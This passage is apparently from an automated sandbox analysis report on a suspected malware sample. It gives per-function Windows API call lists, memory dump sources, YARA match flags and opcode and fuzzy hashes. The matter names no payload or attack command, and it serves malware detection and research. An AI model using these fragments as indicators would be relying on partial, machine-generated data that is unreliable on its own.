                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04216B80
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 04216B8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04217CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04217CDE
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 04216B96
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 04216BBB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                                                                        • Instruction ID: 94a82591ab2ac3dd5e411d8fd48f5d9ba6b940b73e2eae206f5b51206d7a0b43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F51D2B2720216AFEB254F64CC40FAF77EAEBA0754B154229ED05E71A0EB74FD40C690
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 24b6c81d24c1011e6b07ecd5cf8c64815793f5a75054e37069f5cd6800f080c6
                                                                                                                                                                                                                                                                                        • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24b6c81d24c1011e6b07ecd5cf8c64815793f5a75054e37069f5cd6800f080c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                                                                        • Instruction ID: a5137251f92ea3b8c6db9932a62e42dd5095706bf32c3790176834f165276a9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4511A32B20206ABEB249FA88C80FBE77E89F6D364F100119EA15D61F1DF31F550C6A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2017d0c311a5918e7d0e6f8584ac7bf8dd2dc1fa6ddebb020deab9cf5e921c22
                                                                                                                                                                                                                                                                                        • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2017d0c311a5918e7d0e6f8584ac7bf8dd2dc1fa6ddebb020deab9cf5e921c22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0420CC13,0420A4C2), ref: 0420CC2A
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0420CC38
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0420CC51
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,0420CC13,0420A4C2), ref: 0420CCA3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                                                                        • Instruction ID: da0a9d98b78b3c57402a5198e248534a2c890fbbd2eb1ad69464b0000a5e6176
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF01DD7233A3265DA71C16B6FD48B5B37D4DF016787208339E224920F1FF5168019184
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                        • Opcode ID: def3f5077243ae124692277122a2a9679e38c413d1265678c652793f5ad9d567
                                                                                                                                                                                                                                                                                        • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: def3f5077243ae124692277122a2a9679e38c413d1265678c652793f5ad9d567
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                                                                        • Instruction ID: c439df6f543fa247bc858b1f4ce558c904fc1fb521915099534190a6966fb4ac
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F0F4367686122BE22237797C08F2F35D59BE1765F254164F516E22B0EEA1A8024164
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: -@
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                                                                        • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                                                        • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                        • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                                                                        • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04201B30
                                                                                                                                                                                                                                                                                        • std::system_error::system_error.LIBCPMT ref: 04201B3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                        • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                                                                        • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction ID: 4019645d22e2de1611a6294bf7c3f75aa3ab5cb862133cd6c02f6cb9290f9f3d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0C261B2032873EB14AA909841FF97AD89F08394F14C025ED44671D2E7B66A24C2E8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                                                                        • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction ID: 591d13821aac671d919a2eeff4b2509e658ac7dfc3a93ff7c603ec3f138e0507
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F471A2B1B322179BDF318F54C884ABFBBF5EF65360F144229E411A72A0D7B1A945C7A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c06067473a54b0b3c4dcb2ce690be4f72ab32beef6c94a1af6c97b9f8a34214
                                                                                                                                                                                                                                                                                        • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c06067473a54b0b3c4dcb2ce690be4f72ab32beef6c94a1af6c97b9f8a34214
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                                                                        • Instruction ID: 77d57c833036a587c503ea0dabdc9ebe2ec053b6792ebeb5ba4be722604d87eb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8651A371B20205AFEB20EF69CC81B6A77F4EF69724B14056AE84DDB260E731F901CB44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 81a5185806a9401f4f6bbc1d868cdf71e9ab0390722ec972a11af2b9906213fa
                                                                                                                                                                                                                                                                                        • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81a5185806a9401f4f6bbc1d868cdf71e9ab0390722ec972a11af2b9906213fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                                                                        • Instruction ID: 86ab9bb6effe8817ba1905175aa501a3cd5c24198aa1a86aa224d49b6e7ccccf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2141D172B10300AFDB24DF78C880A5EB3F5EF95314B5545A9D516EB2A1EB71B941CB80
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
